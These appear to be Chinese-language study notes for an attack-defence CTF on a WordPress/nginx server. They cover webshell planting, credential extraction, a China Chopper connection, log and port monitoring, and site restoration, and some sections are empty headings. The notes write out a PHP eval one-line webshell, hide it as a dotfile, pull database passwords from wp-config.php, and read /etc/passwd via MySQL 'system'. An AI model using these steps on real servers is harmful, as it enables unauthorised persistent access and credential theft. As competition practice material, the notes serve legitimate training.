混战

netdiscover -r 10.0.0.0/24

登录后台一般关键字是admin或者login

一、把整个网站 www文件打包下来

[root@nginx php-5.6.30]# find / -name www

/application/nginx/html/www/【显示这个】

[root@nginx php-5.6.30]#cd /application/nginx/html/www/【进到目录下面】

[root@nginx www]#tar cf 1.gz ./#【打包成1.gz】

[root@nginx www]#ls【查看到当前目录文件】

【有显示1.gz】

二、通过url把文件down下来

在网址比如10.0.0.118后面加/1.gz-------->10.0.0.118/1.gz

三、把1.gz在本地解压下来

找到wp-config.php配置文件--->用notepad++打开--->看到mysql数据库密码为123456

四、改mysql的密码和配置文件mysql的密码

1、改mysql密码

[root@nginx www]#mysqladmin -uroot password -p123456

new password:123

confirm new password:123

2、改配置文件mysql的密码

[root@nginx www]#vim wp-config.php

password后面‘’里面123456改成123

五、查找危险操作（eval）

查找---->输入eval---->目录为（由wp-admin/wp-content/wp-includes的文件夹）----->全部查找

忽略掉在/**/、*里和不是单独的eval的

六、一句话木马

<?php eval($_POST[abc]);?>

[root@nginx www]#echo "<?php eval($_POST[abc]);?>" > 1.php【在当前目录下把这一句木马保存为1.php】

[root@nginx www]#ls【会看到当前目录下有1.php】

七、用网页打开1.php

10.0.0.118/1.php

界面空白没报错，说明木马执行成功

八、中国菜刀连接一句话木马

地址输入：http://10.0.0.118/1.php  -->后面框：abc--->添加

可以看到网站所有目录，一般flag存在www下面

九、waf包含进

require_once( dirname(_FILE_),'/wp-load.php');

一、打开日志文件分析日志

[root@nginx www]#cd ..【返回上一级】

[root@nginx html]#ls

[root@nginx html]#cd ..

[有显示log]

[root@nginx nginx]#ls logs/【打开logs】

[显示access.log error.log nginx.pid]

[root@nginx nginx]#tail logs/access.log -t【分析别人的日志，然后可以照着学】

对方有www下面一句话木马，关键是要找到！！

一、时刻监控自己的端口有没有多出来的【对方是用msf加进来的端口】

[root@nginx nginx]#ss -ano

如果有多出来，就kill pid

[root@nginx nginx]#ps -ef | grep 80

第一列数字就是pid

直接 kill pid即可阻止别人通过msf获取到自己本机的flag【flag一般在根目录下，很好找，只有读权限】

一、隐藏木马显示并利用

[root@nginx nginx]#cd ~

[root@nginx ~]#ls

[root@nginx ~]#ls -a【比上面的多出很多前面带.的隐藏文件】

(下面有.access.log)

[root@nginx ~]#cat .access.log【可以找到里面的一句话木马，然后利用】

二、利用隐藏文件里面的木马，并用中国菜刀利用

[root@nginx ~]#cd /application/nginx/html/www/

[root@nginx www]#ls 

[root@nginx www]#mv 1.php .1.php【把1.php改为.1.php】

[root@nginx www]#ls -a【可看到.1.php】

浏览器---->10.0.0.118/.1.php--->中国菜刀

三、高级木马

四、超级木马

五、变种木马

六、让木马永远活跃

把下面代码放在网站的根目录下面 www下面（上传），一般拿到了后台就可以直接上传

七、日志记录

不小心把网站毁了，修复流程【在修改别人网站之前，把网站下所有文件打包成1.gz，为了可以修复】

一、

[root@nginx html]#mv 1.gz www/【把1.gz移到www目录下】

[root@nginx html]#cd www

[root@nginx www]#ls

(显示1.gz)

[root@nginx www]#tar xf 1.gz【解压1.gz】

[root@nginx www]#ls

（有wp-config.php文件）

[root@nginx www]#mv wp-config.php ..【将这个文件保存在上级】

[root@nginx www]#rm -rf *【清空缓存】

[root@nginx www]#ls【什么都没有 清空成功】

[root@nginx www]#cd ..【返回上级目录】

[root@nginx html]#rm -rf wordpress【干掉wordpress】

[root@nginx html]#ls

(有wordpress-4.8.1-zh_CN.tar.gz)

[root@nginx html]#tar zxvf wordpress-4.8.1-zh_CN.tar.gz

[root@nginx html]#ls【会生成一个wordpress目录】

[root@nginx html]#cd wordpress

[root@nginx wordpress]#ls

发现没有配置文件

[root@nginx wordpress]#mv ../wp-config.php.【把上上级的配置文件移到当前目录下来】

[root@nginx wordpress]#ls【发现有这个配置文件】

[root@nginx wordpress]#mv * ../www/【移到www目录下面】

[root@nginx wordpress]#ls ../www/【发现有这个配置文件】

查看浏览器  提示数据库连接错误，还要重新配置一下

[root@nginx wordpress]#cd ../www/

[root@nginx www]#ls

[root@nginx www]#vim wp-config.php

[root@nginx www]#mysqladmin -uroot password -p123

新密码：123456

重复新密码：123456

再刷新网页，成功修复

l连接mysql

[root@nginx www]#mysql -uroot -p123456【登录mysql】

mysql>system ifconfig【提权】

mysql>system cat /etc/passwd

mysql>system +后面kail命令行